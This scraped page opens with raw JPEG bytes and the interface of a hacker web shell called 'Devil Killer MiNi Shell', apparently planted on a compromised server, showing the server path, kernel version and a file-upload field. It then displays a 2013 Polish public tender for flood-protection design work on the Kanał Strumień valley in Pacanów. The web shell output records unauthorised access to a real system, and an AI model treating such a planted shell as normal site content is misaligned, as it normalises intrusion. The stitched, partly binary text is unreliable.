JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130423/61285-N-2013.html

<p class="kh_header"><b>Kielce: opracowanie dokumentacji projektowej dla zadania p.n.: Zabezpieczenie przeciwpowodziowe doliny Kanał Strumień zad. III w km 17+230 - 23+190, na terenie gminy Pacanów, 
powiat Busko - Zdrój, woj. świętokrzyskie</b><br>
<b>Numer ogłoszenia: 61285 - 2013; data zamieszczenia: 23.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach , ul. Witosa 86, 25-561 Kielce, woj. świętokrzyskie, tel. 041 3340105 wew. 209, 309, faks 041 3340105 wew. 409.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szmiuw.kielce.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wojewódzka samorządowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> opracowanie dokumentacji projektowej dla zadania p.n.: Zabezpieczenie przeciwpowodziowe doliny Kanał Strumień zad. III w km 17+230 - 23+190, na terenie gminy Pacanów, 
powiat Busko - Zdrój, woj. świętokrzyskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Opis przedmiotu zamówienia i miejsce realizacji przedmiotu zamówienia

Kod CPV

71322000-1 Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej.
71354000-4 usługi sporządzania map
1. Przedmiot zamówienia. 

Przedmiotem zamówienia jest wykonanie usługi polegającej na opracowaniu dokumentacji projektowej dla potrzeb zabezpieczenia przeciwpowodziowego doliny Kanał Strumień zad. III w km 17+230 - 23+190, na terenie gminy Pacanów, powiat Busko - Zdrój, woj. świętokrzyskie.

1.1 Wielkość oraz zakres przedmiotu zamówienia.

Zamówienie obejmuje wykonanie projektu zabezpieczenia przeciwpowodziowego doliny Kanału Strumień w km 17+230 - 23+190, zadanie nr III, na terenie gminy Pacanów, z uwzględnieniem m.in. dróg przywałowych i budowli wałowych, w oparciu m.in. o: Koncepcję zabezpieczenia przeciwpowodziowego doliny Kanału Strumień opracowaną przez Biuro Studiów i Projektów Gospodarki Wodnej Rolnictwa BIPROMEL Sp. z o.o. (2006 r.) oraz aneks po ZOPI do w/w Koncepcji .
Na zlecenie Świętokrzyskiego Zarządu Melioracji i Urządzeń Wodnych w Kielcach opracowywana jest obecnie dokumentacja projektowa Ochrona przed powodzią rejonu Połańca poprzez rozbudowę i podwyższenie wałów rzeki Wisły i Czarnej Staszowskiej z terminem wykonania 31.03.2014r. Obowiązkiem Wykonawcy jest zapoznanie się z założeniami projektowymi w/w dokumentacji. 
Rozwiązania projektowe powinny uwzględniać uwarunkowania wynikające z dwóch kluczowych dokumentów koordynujących działania dla integracji celów polityki wodnej ukierunkowanej na obniżenie zagrożenia powodziowego, a mianowicie: 
- Ramowej Dyrektywy Wodnej (Dyrektywa Parlamentu Europejskiego i Rady 2000/60/WE z dnia 23.10.2000 r. ustanawiająca ramy wspólnotowego działania w dziedzinie polityki wodnej), ustanawiająca ramy na rzecz ochrony wszystkich typów wód;
- Dyrektywy Powodziowej (Dyrektywa 2007/60/WE Parlamentu i Rady z dnia 23.10.2007 r. w sprawie oceny ryzyka powodziowego i zarządzania nim), regulująca podstawy podejmowania działań dla ograniczenia zagrożenia powodziowego oraz jego skutków.

Przedmiotowe dokumentacje winny być zgodne z w/w dokumentami z zakresu gospodarki wodnej oraz być spójne z priorytetami i celami ochrony środowiska, w tym ochrony przyrody, ustalonymi w dokumentach strategicznych unijnych, krajowych i regionalnych.

Obowiązkiem Wykonawcy jest zapoznanie się z w/w Koncepcją oraz aneksem a także przeprowadzenie wizji lokalnej w terenie oraz uzyskanie, na swoją odpowiedzialność i ryzyko, wszelkich istotnych informacji, które mogą być konieczne do przygotowania oferty. Wizję lokalną Wykonawca dokona na swój koszt.
Termin wizji w terenie wykonawca może uzgodnić z pracownikami Oddziału Rejonowego ŚZMiUW w Busku-Zdroju, nr tel. (41) 378-49-13.
1.1.1. Wymagania odnośnie dokumentacji projektowej:

1) dokumentacja będzie służyć do opisu przedmiotu zamówienia do przetargu w oparciu o ustawę Prawo zamówień publicznych na roboty budowlane oraz realizację pełnego zakresu robót budowlanych na jej podstawie;
2) dokumentacja nie może opisywać przedmiotu zamówienia przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba, że jest to uzasadnione specyfikacją przedmiotu zamówienia lub nie można tego opisać za pomocą dostatecznie dokładnych określeń;
3) dokumentacja powinna opisywać przedmiot zamówienia, w tym zastosowane materiały i urządzenia, za pomocą cech technicznych i jakościowych, przy przestrzeganiu Polskich Norm przenoszących europejskie normy zharmonizowane. W przypadku braku Polskich Norm przenoszących europejskie normy zharmonizowane uwzględnia się: europejskie aprobaty techniczne, wspólne specyfikacje techniczne;
4) dokumentacja musi być trwale i czytelnie oznaczona, ponadto trwale oprawiona;
5) w opracowanej dokumentacji będą wskazane wyroby budowlane (materiały i urządzenia) dopuszczone do obrotu i powszechnie dostępne na rynku.

1.1.2. Zakres przedmiotowy:

1) Wykonanie dokumentacji oraz specyfikacji technicznej wykonania i odbioru robót budowlanych (STWiORB), o których mowa w art. 31 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, zgodnie z przepisami Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2010 r. Nr 72, poz. 464 z późn. zm.);
2) Uzyskanie wymaganych opinii, sprawdzeń, uzgodnień dokumentacji projektowej wymaganych przepisami prawa, (w tym uzgodnienie m.in. z: ZUDP, z Regionalnym Zarządem Gospodarki Wodnej i in.).
3) Do obowiązków Wykonawcy należy przygotowanie materiałów i wniosku o decyzje o środowiskowych uwarunkowaniach oraz uzyskać przedmiotową decyzję w imieniu Zamawiającego w terminie do 30-10-2013r. Ponadto Wykonawca zobowiązany jest przygotować wniosek o pozwolenie wodnoprawne i złożyć go w odpowiednim urzędzie oraz przygotować wniosek i materiały do złożenia wniosku o wydanie decyzji o pozwoleniu na realizację inwestycji. 
4) Dokumentację należy wykonać zgodnie z obowiązującymi przepisami, normami, ze sztuką budowlaną oraz winna być ona opatrzona klauzulą o kompletności i przydatności z punktu widzenia celu, któremu ma służyć; informacje zawarte w dokumentacji projektowej w zakresie technologii wykonania robót, doboru materiałów i urządzeń należy określić w sposób zgodny z przepisami ustawy Prawo zamówień publicznych;
5) Wykonawca przedmiotu zamówienia zobowiązany jest do przedstawienia i uzgodnienia z Zamawiającym wstępnej fazy rozwiązań projektowych - Rada Techniczna; ponadto Wykonawca zobowiązany jest do zapoznania mieszkańców terenu objętego projektem z propozycjami rozwiązań dotyczących budowy przedmiotowego odcinka wału (okazanie projektu).
6) Wykonawca zobowiązany będzie do sprawowania nadzoru autorskiego w toku robót budowlanych wykonywanych w oparciu o opracowaną dokumentację projektową;
- Prace przedprojektowe :

A) Dokumentacja geodezyjna (w ilości wersja papierowa 6 egz. + wersja elektroniczna 1 egz. na nośniku DVD, pliki mapowe z rozszerzeniem pdf i dwg oraz innym umożliwiającym edycję) ma zawierać:
1). aktualne pełne wypisy z ewidencji gruntów,
2). mapę w skali co najmniej 1:1 000 przedstawiającą projektowany obszar inwestycji z zaznaczeniem podziału geodezyjnego nieruchomości oraz terenu niezbędnego dla obiektów budowlanych oraz istniejące uzbrojenie terenu, a także wskazanie części nieruchomości będących częścią inwestycji, na której nie będą prowadzone roboty budowlane,
3). wykaz działek w całości wchodzących pod wał oraz wykaz działek dzielonych,
4). mapy sytuacyjno - wysokościowe w skali 1:1000 lub 1:500 do celów projektowych z wykorzystaniem istniejących w PODGiK opracowań geodezyjnych w niezbędnym zakresie do celów projektowych.
Dokumentację należy opracować na aktualnych mapach sytuacyjno-wysokościowych z nakładką aktualnej mapy ewidencyjnej (z numerami działek). 
Mapy sytuacyjno-wysokościowe należy zaopatrzyć w klauzulę Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej oraz Zespołu Uzgadniania Dokumentacji Projektowej, że są aktualne i nadają się do celów projektowych. 
Mapy ewidencyjne i wypisy z rejestru gruntów należy uzyskać i potwierdzić aktualność we właściwym Starostwie Powiatowym.

Pomiary geodezyjne należy wykonać z uwzględnieniem inwentaryzacyjnych pomiarów obiektów związanych technicznie i funkcjonalnie z projektowaną inwestycją oraz otoczeniem w zasięgu niezbędnym do wykonania przedmiotu zamówienia.
W ramach Programu ochrony przed powodzią w dorzeczu górnej Wisły udostępniony jest dla tego zadania Numeryczny Model Terenu powstający w ramach projektu ISOK, który zostanie udostępniony Wykonawcy po podpisaniu umowy. 

B) Materiały do decyzji o środowiskowych uwarunkowaniach (wersja papierowa. + wersja elektroniczna na nośniku DVD, pliki mapowe - pliki z rozszerzeniem pdf i dwg lub inne umożliwiające edycję), zgodnie z ustawą z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227), w tym kartę informacyjną przedsięwzięcia zgodnie z wymogami organów opiniujących (wersja papierowa i wersja cyfrowa). W/w materiały winny odpowiadać Wytycznym Zasadom weryfikacji przesłanek z art. 4 ust. 7 Ramowej Dyrektywy Wodnej. Wykonawca zobowiązany jest dokonać oceny oddziaływania realizowanego przedsięwzięcia hydrotechnicznego na stan/potencjał ekologiczny jednolitych części wód, w tym:
- identyfikację jednolitej części wód powierzchniowych, kategorii jednolitej części wód powierzchniowych oraz przypisanych jej celów środowiskowych
- dokonać ustalenia czynników oddziaływania przedsięwzięcia na elementy jakości wód (elementy: biologiczne, hydromorfologiczne, fizykochemiczne) - analiza oddziaływań na etapie realizacji i eksploatacji planowanego przedsięwzięcia oraz analiza wpływu planowanego przedsięwzięcia na cele środowiskowe JCWP, działania ukierunkowane na maksymalne złagodzenie skutków przedmiotowego przedsięwzięcia dla określonego celu;
- przy ocenie istotności oddziaływania przedsięwzięcia na stan wód Wykonawca uwzględni uwarunkowania związane z obowiązkiem osiągnięcia celów środowiskowych (informacja wyjaśniająca nt. definicji i zagadnień problemowych w kontekście stosowania art. 4 ust. 7 RDW).
 Przedmiotowe materiały do decyzji winny zawierać m. in.:
1) poświadczoną przez właściwy organ kopię mapy ewidencyjnej obejmującej przewidywany teren, na którym będzie realizowane przedsięwzięcie oraz obejmującej obszar, na który będzie oddziaływać przedsięwzięcie
2) wypis z rejestru gruntów obejmujący przewidywany teren, na którym będzie realizowane przedsięwzięcie oraz obejmujący obszar, na który będzie oddziaływać przedsięwzięcie,
3) kartę informacyjną przedsięwzięcia zawierającą dane określone w art. 3 ust. 1, pkt. 5) ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko, uzupełnioną o warunkowania wyszczególnione w art. 63.

UWAGA: w Karcie Informacyjnej powinny się znaleźć informacje nt. przeprowadzonej oceny oddziaływania inwestycji na stan wód.
Ponadto Wykonawca zobowiązany jest sporządzić wniosek o wydanie decyzji o środowiskowych uwarunkowaniach zgodnie z wymaganiami art. 74 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko,  złożyć go w odpowiednim urzędzie i uzyskać w imieniu Zamawiającego przedmiotową decyzję.  

C) Dokumentacja geotechniczna (3 egz.) w zakresie niezbędnym do ustalenia w szczególności warunków gruntowych, w oparciu o szczegółowe wytyczne projektowania - wykonanie 5 otworów geotechnicznych/1 km; w przypadku gdy zakres inwestycji będzie występował w obszarze III kategorii geotechnicznej ze względu na skomplikowane warunki gruntowe, zgodnie z art.8 pkt. 2 Rozporządzenia MSWiA z dnia 24.09.1998 r. (Dz.U. Nr 126 poz.839) w sprawie ustalenia geotechnicznych warunków posadowienia obiektów budowlanych dla tej kategorii należy opracować dokumentację geologiczno - inżynierską (3 egz.) wraz z uzyskaniem decyzji zatwierdzającej,

D) Przygotowanie niezbędnych materiałów do uzyskania decyzji z art. 118 ustawy z dnia 16.04.2004 r. o ochronie przyrody (Dz. U. z 2004 r. Nr 92, poz. 6056, z późn. zm.) ustalającej warunki prowadzenia robót - jeśli będzie dotyczyć.

E) Dane hydrologiczne w zakresie niezbędnym do wykonania przedmiotu zamówienia Wykonawca pozyska  z IMGW.
Obliczenia i analizy hydrauliczne należy wykonać przy  uwzględnieniu:
- przepływów obliczeniowych i warunków technicznych wynikających  z: 
- Rozporządzenia Ministra Środowiska z dnia 20 kwietnia 2007r. w sprawie warunków technicznych jakim powinny odpowiadać budowle hydrotechniczne i ich usytuowanie; 
- Rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 30 maj 2000r. w sprawie warunków jakim powinny odpowiadać drogowe obiekty inżynierskie i ich usytuowanie
Wykonawca uzgodni wyniki wykonanych w przedmiocie zamówienia obliczeń i analiz hydraulicznych z instytucjami państwowymi właściwymi do opracowania map zagrożenia i ryzyka powodziowego (RZGW w Krakowie). 
W wykonywanych obliczeniach i analizach hydrologiczno - hydraulicznych należy wykorzystać dane: NMT, NMPT oraz ortofotomapy na obszarze objętym przedmiotem zamówienia oraz w zakresie wynikającym z metodyki prowadzonych obliczeń.

- Prace projektowe:

A) Projekt budowlany (wersja papierowa 6 egz. + wersja elektroniczna 1 egz. na nośniku DVD, załączniki mapowe - pliki z rozszerzeniem pdf i dwg lub inne umożliwiające edycję) w zakresie uwzględniającym specyfikę robót budowlanych, opracowany zgodnie z wymogami art. 34 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. z 2010 r. Nr 243, poz. 1623) oraz z Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012 r. poz. 462 z późn. zm.) oraz z zapisami
- Rozporządzenia Ministra Środowiska z dnia 20 kwietnia 2007 r. w sprawie warunków technicznych, jakim powinny odpowiadać budowle hydrotechniczne i ich usytuowanie ( Dz. U. Nr 86  z 2007r. poz.579); 
- Ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227 z 2008 r. z późn. zm.);
 
- Ustawy z dnia 18 lipca 2001 r. Prawo wodne (Dz. U. 2012 r. poz. 145);
- Rozporządzenia Rady Ministrów z dnia 09.11.2004 r. w sprawie określenia rodzajów przedsięwzięć mogących znacząco oddziaływać na środowisko oraz szczegółowych uwarunkowań związanych z kwalifikowaniem przedsięwzięcia do sporządzania raportu o oddziaływaniu na środowisko (Dz. U. Nr 257 poz. 2573);
- Ustawy z dnia 27.03.2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80 z 2003 r. poz. 717 z późn. zm.);
- Ustawy z dnia 08.07.2010 r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych (Dz. U. Nr  143 poz. 963);
- Ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. 2010r. Nr 113 poz. 759);
- Ustawą z dnia 21.08.1997 r. o gospodarce nieruchomościami (tj. Dz. U. Nr 261 poz. 2603 z 2004 r. z późn. zm.);
- oraz przepisami wykonawczymi do tych ustaw i obowiązującymi w dacie przekazania opracowania przepisami, obowiązującymi Polskimi Normami pozwalającymi na uzyskanie pełnych uzgodnień projektu i pozwolenia na realizację inwestycji. 
W przypadku zmian w przepisach, pociągających za sobą potrzebę uzyskania nowych decyzji bądź uzgodnień, Wykonawca ma obowiązek ich pozyskania. Dokumentacja projektowa powinna uwzględniać wszystkie obowiązki na dzień przekazania jej Zamawiającemu.

B) W przypadku kolizji z uzbrojeniem terenu projekty branżowe (wersja papierowa 6 egz. + wersja elektroniczna 1 egz. na nośniku DVD, załączniki mapowe - pliki z rozszerzeniem pdf i dwg lub inne umożliwiające edycję) wraz z uzgodnieniami i pozwoleniami, decyzja ZUDP,

C) Informacja BIOZ  (wersja papierowa 6 egz. + wersja elektroniczna 1 egz. na nośniku CD, - pliki z rozszerzeniem pdf  i doc) opracowana zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. Nr 120 poz. 1126);

D) Projekt wykonawczy (wersja papierowa 6 egz. + wersja elektroniczna 1 egz. na nośniku DVD, załączniki mapowe - pliki z rozszerzeniem pdf i dwg lub inne umożliwiające edycję), uzupełniający i uszczegółowiający projekt budowlany w zakresie i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego oraz realizacji robót budowlanych; 

E) Przedmiary robót (wersja papierowa 6 egz. + wersja elektroniczna 1 egz. na nośniku CD, - pliki z rozszerzeniem pdf i kst oraz innym umożliwiającym edycję), sporządzone zgodnie z wymogami określonymi w  Rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004 r. Nr 202 poz. 2072 z późn. zm.);

F) Kosztorys inwestorski (wersja papierowa 6 egz. + wersja elektroniczna 1 egz. na nośniku CD, - pliki z rozszerzeniem pdf i kst oraz innym umożliwiającym edycję), opracowany zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004 r. Nr 130 poz. 1389 z późn. zm.). 
Dodatkowo należy sporządzić zestawienie R, M, S.
Wykonawca zobowiązany jest uwzględnić w kosztorysie inwestorskim koszty odtworzenia osnowy geodezyjnej na rozbudowywanym odcinku obwałowania.

G) Specyfikacja techniczna wykonania i odbioru robót budowlanych (wersja papierowa 6 egz. + wersja elektroniczna 1 egz. na nośniku CD, - pliki z rozszerzeniem pdf i doc), zawierająca zbiory wymagań niezbędnych dla określenia standardu i jakości wykonania robót, w zakresie wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót - sporządzona zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. (Dz. U. z 2004 r. Nr 202 poz. 2072 z późn. zm.). STWiORB należy opracować z uwzględnieniem podziału szczegółowego według Wspólnego Słownika Zamówień.

H) Operat wodnoprawny (wersja papierowa 3 egz. + wersja elektroniczna 1 egz. na nośniku CD, - pliki z rozszerzeniem pdf  i doc) zgodnie z Ustawą z dnia 18 lipca 2001r. Prawo wodne - (Dz. U. 2012 r. poz. 145)

I)  Studium wykonalności (wersja papierowa 6 egz. + wersja elektroniczna 1 egz. na nośniku CD, - pliki z rozszerzeniem pdf i doc) - mające na celu dostarczenie inwestorowi wszelkich danych niezbędnych do podjęcia decyzji inwestycyjnej związanych z przewidywanymi funkcjami wału przeciwpowodziowego, a w szczególności zaś:
- Ochrona przeciwpowodziowa (w tym powierzchnia obszaru chronionego w poszczególnych miejscowościach, liczba ludności na obszarze zabudowanym, rodzaj chronionej infrastruktury z podaniem rodzaju i kilometrażu, małe i średnie przedsiębiorstwa, zabudowania mieszkalne i gospodarcze, obiekty użyteczności publicznej, obiekty chronione i inne nie wymienione). Obszar chroniony winien być naniesiony na mapy poglądowe;
- Wpływ na wzrost atrakcyjności inwestycyjnej (zwiększenie terenów dostępnych pod budownictwo, przewidywane powstanie małych i średnich przedsiębiorstw, gospodarstw agroturystycznych itp.); 
- Przeprowadzenie analizy opłacalności realizacji inwestycji. Studium powinno obejmować wszelkie aspekty techniczne, finansowe, ekonomiczne oraz związane ze środowiskiem naturalnym uwarunkowania zadania inwestycyjnego. Celem studium jest dostarczenie przesłanek do podjęcia decyzji o przyznanie środków finansowych z funduszy pomocowych dla planowanej inwestycji.
- Hierarchizację zadania inwestycyjnego i możliwości jego etapowania;
- Wariantowość rozwiązań. 
Ponadto studium powinno zawierać informacje dotyczące opisu ilości chronionych mieszkańców z podziałem na miejscowości, gospodarstw rolnych, chronionych obiektów, w tym użyteczności publicznej z podaniem ich wartości oraz zabytków z podaniem klasy ochrony, obszaru chronionego oraz punktów styku.

J) Operat dendrologiczny (wersja papierowa 6 egz. + wersja elektroniczna 1 egz. na nośniku CD, - pliki z rozszerzeniem pdf i doc) na podstawie przeprowadzonej inwentaryzacji gatunkowej drzew i krzewów przewidzianych w projekcie do wycinki, z dokładnym i czytelnym zaznaczeniem (kolorem i numerem) drzew i krzewów do usunięcia, ze wskazaniem właściciela. Opracowanie należy uzgodnić z właściwymi jednostkami, a inwentaryzacja ma zawierać m.in.: informację o właścicielu lub posiadaczu nieruchomości, na której rosną drzewa i krzewy, nazwę gatunków drzew i krzewów, obwód pnia na wysokości 1,30m, wielkość powierzchni, z której zostaną usunięte krzewy. Inwentaryzację drzew i krzewów przeznaczonych do wycinki powinna być sporządzona na aktualnej mapie do celów projektowych oraz zawierać wykaz właścicieli działek zgodnie z ewidencją gruntów. 

K) Uzgodnienie lokalizacji rezerw ziemnych (wersja papierowa 6 egz. + wersja elektroniczna 1 egz. na nośniku CD, - pliki z rozszerzeniem pdf i doc) niezbędnych do budowy wałów oraz opracowanie projektu zagospodarowania rezerw ziemnych wraz z badaniami geotechnicznymi przydatności gruntu na nasyp wału oraz sporządzeniem map sytuacyjno-wysokościowych terenu lokalizacji rezerw w skali 1:1000; Jeżeli miejsce poboru rezerw ziemnych będzie znajdować się w międzywalu, projekt zagospodarowania rezerw należy uzgodnić z RZGW.

L) Projekt podziału nieruchomości w formie operatu geodezyjnego podziału przedstawiającego podział działek niezbędnych dla wykonania obiektów budowlanych, zgodnie z ustawą z dnia 8 lipca 2010 r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych (Dz. U. z 2010r., nr 143, poz. 963), który powinien zawierać:
a) mapy ewidencyjne zawierające projekty podziału nieruchomości oraz nieruchomości w całości wchodzące w zakres projektowanej inwestycji,
b) mapę ewidencyjną zawierającą projektowany obszar inwestycji z zaznaczeniem podziałów nieruchomości oraz nieruchomości wchodzące w całości w zakres projektowanej inwestycji, a także zaznaczony obszar zajęcia w sposób trwały i czasowy pod realizację tej inwestycji,
c) wykaz zmian gruntowych (zbiorczy),
d) wykaz synchronizacyjny (porównawczy, kataster-ewidencja),
e) kopię protokołów okazania granic (przekazanych do PODGiK),
f) badanie stanu prawnego wszystkich nieruchomości objętych projektem inwestycji)kopie decyzji, KW, kopie aktów notarialnych, itd.)

- Inne opracowania:

